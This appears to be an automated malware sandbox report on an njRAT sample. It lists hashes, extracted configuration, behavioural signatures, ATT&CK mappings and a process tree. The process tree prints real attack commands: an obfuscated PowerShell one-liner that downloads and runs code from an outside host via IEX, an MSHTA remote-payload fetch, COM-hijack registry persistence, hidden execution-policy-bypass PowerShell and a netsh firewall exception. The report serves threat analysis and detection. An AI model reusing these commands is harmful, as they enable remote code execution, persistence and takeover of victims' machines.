njrat | ae65e1d43dc79fba514c715b37f058e20a99d479663034f3eabbd6614ba7d6b0

General

Target

LIYDOERWQPOKERHAVAXOCI.vbs
Size

1KB
MD5

733afa01e2447e2fcafcf4f224a1a4a7
SHA1

fcb94d8e29aa8bb802104a6ea49f7e715bea7031
SHA256

00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a
SHA512

42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948

Score

10^/10

njrat hacked evasion persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://tradeguru.com.pk/enc1

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes

reg_key
Microsoft.Exe

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.EXEPOWERSHELL.exePOWERSHELL.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	3496	MSHTA.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2316	3496	POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2992	3496	POWERSHELL.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 3 IoCs

Processes:

MSHTA.EXEPOWERSHELL.exe

flow pid process

16 4812 MSHTA.EXE
18 4812 MSHTA.EXE
24 2316 POWERSHELL.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

2456 netsh.exe

flow	pid	process
16	4812	MSHTA.EXE
18	4812	MSHTA.EXE
24	2316	POWERSHELL.exe

pid	process
2456	netsh.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3520 set thread context of 2380 3520 powershell.exe aspnet_compiler.exe

description	pid	process	target process
PID 3520 set thread context of 2380	3520	powershell.exe	aspnet_compiler.exe

Modifies registry class 4 IoCs

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll"	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2376 reg.exe
4468 reg.exe

pid	process
2376	reg.exe
4468	reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

pid	process
2316	POWERSHELL.exe
2316	POWERSHELL.exe
2392	powershell.exe
2392	powershell.exe
2992	POWERSHELL.exe
2992	POWERSHELL.exe
3520	powershell.exe
3520	powershell.exe
3520	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2316	POWERSHELL.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2992	POWERSHELL.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 2316 wrote to memory of 2392	2316	POWERSHELL.exe	powershell.exe
PID 2316 wrote to memory of 2392	2316	POWERSHELL.exe	powershell.exe
PID 2392 wrote to memory of 2008	2392	powershell.exe	WScript.exe
PID 2392 wrote to memory of 2008	2392	powershell.exe	WScript.exe
PID 2992 wrote to memory of 3052	2992	POWERSHELL.exe	cmd.exe
PID 2992 wrote to memory of 3052	2992	POWERSHELL.exe	cmd.exe
PID 3052 wrote to memory of 2376	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 2376	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 4468	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 4468	3052	cmd.exe	reg.exe
PID 3052 wrote to memory of 4768	3052	cmd.exe	cmd.exe
PID 3052 wrote to memory of 4768	3052	cmd.exe	cmd.exe
PID 4768 wrote to memory of 3520	4768	cmd.exe	powershell.exe
PID 4768 wrote to memory of 3520	4768	cmd.exe	powershell.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 3520 wrote to memory of 2380	3520	powershell.exe	aspnet_compiler.exe
PID 2380 wrote to memory of 2456	2380	aspnet_compiler.exe	netsh.exe
PID 2380 wrote to memory of 2456	2380	aspnet_compiler.exe	netsh.exe
PID 2380 wrote to memory of 2456	2380	aspnet_compiler.exe	netsh.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"
1⤵
PID:5088

C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc1
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/$-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\$_8^[*1)6%\','C').Replace('4]{/3<*/$-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$&#3tR3=#_^2&^&=4$[-(8[8$&#32#127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$&#3'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$&#3','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9$7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server1.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"
3⤵
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:3052

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
3⤵
- Modifies registry class
- Modifies registry key
PID:2376

C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
PID:4468

C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
3⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2380

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
6⤵
- Modifies Windows Firewall
PID:2456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1
Filesize
604KB

MD5
ab1fce3ab2f6f211da8f8dc30c2b3060

SHA1
ae0dff660b20f9209a66029d44b048a63cc80336

SHA256
7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

SHA512
ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
Filesize
706B

MD5
1a7a326391b638c03d76369946fc0052

SHA1
7ae0ffd77ec76b94d735265efad35ddd072cdf36

SHA256
0223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f

SHA512
449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1
Filesize
3KB

MD5
89879c7e1b80b9171b57ec7290c50cf8

SHA1
4d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3

SHA256
dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2

SHA512
d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b

Download Submit
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs
Filesize
1KB

MD5
77d9ab54d90a588d38b4a402d7cf25bb

SHA1
f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6

SHA256
25f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4

SHA512
c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
51aa87521f685fa8d4f4bdbd7684a350

SHA1
fd4027d9b24c41461525b0f3f764aa6b2ddd5803

SHA256
6e9453d9cff64f88f0a0b0b5cda807f7deac354120724137e7426871401ea0d6

SHA512
637f0b4c94abb0bcf0bbf21ec2d328eccbf1bd6a37c5dbd309cd428f5aaab08d0f6102a8f45c09372fba57c034fc88ed7950c9afe366583cd5f636ee0b974947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
171c8388c36c7ff24bff6d83366bcbd6

SHA1
b457641f8c88a56590921ce729d3111a8964107a

SHA256
cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621

SHA512
94889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
memory/2008-139-0x0000000000000000-mapping.dmp

Download
memory/2316-134-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2316-133-0x0000021EFFC20000-0x0000021EFFC42000-memory.dmp

Filesize
136KB

Download
memory/2316-135-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2316-153-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2376-143-0x0000000000000000-mapping.dmp

Download
memory/2380-154-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2380-165-0x0000000006010000-0x000000000601A000-memory.dmp

Filesize
40KB

Download
memory/2380-164-0x0000000006650000-0x00000000066B6000-memory.dmp

Filesize
408KB

Download
memory/2380-161-0x00000000060A0000-0x0000000006644000-memory.dmp

Filesize
5.6MB

Download
memory/2380-162-0x0000000005AF0000-0x0000000005B82000-memory.dmp

Filesize
584KB

Download
memory/2380-160-0x0000000005990000-0x0000000005A2C000-memory.dmp

Filesize
624KB

Download
memory/2380-155-0x000000000040BBBE-mapping.dmp

Download
memory/2392-150-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2392-136-0x0000000000000000-mapping.dmp

Download
memory/2392-137-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2456-163-0x0000000000000000-mapping.dmp

Download
memory/2992-147-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/2992-159-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/3052-141-0x0000000000000000-mapping.dmp

Download
memory/3520-157-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/3520-148-0x00007FFB07940000-0x00007FFB08401000-memory.dmp

Filesize
10.8MB

Download
memory/3520-146-0x0000000000000000-mapping.dmp

Download
memory/4468-144-0x0000000000000000-mapping.dmp

Download
memory/4768-145-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads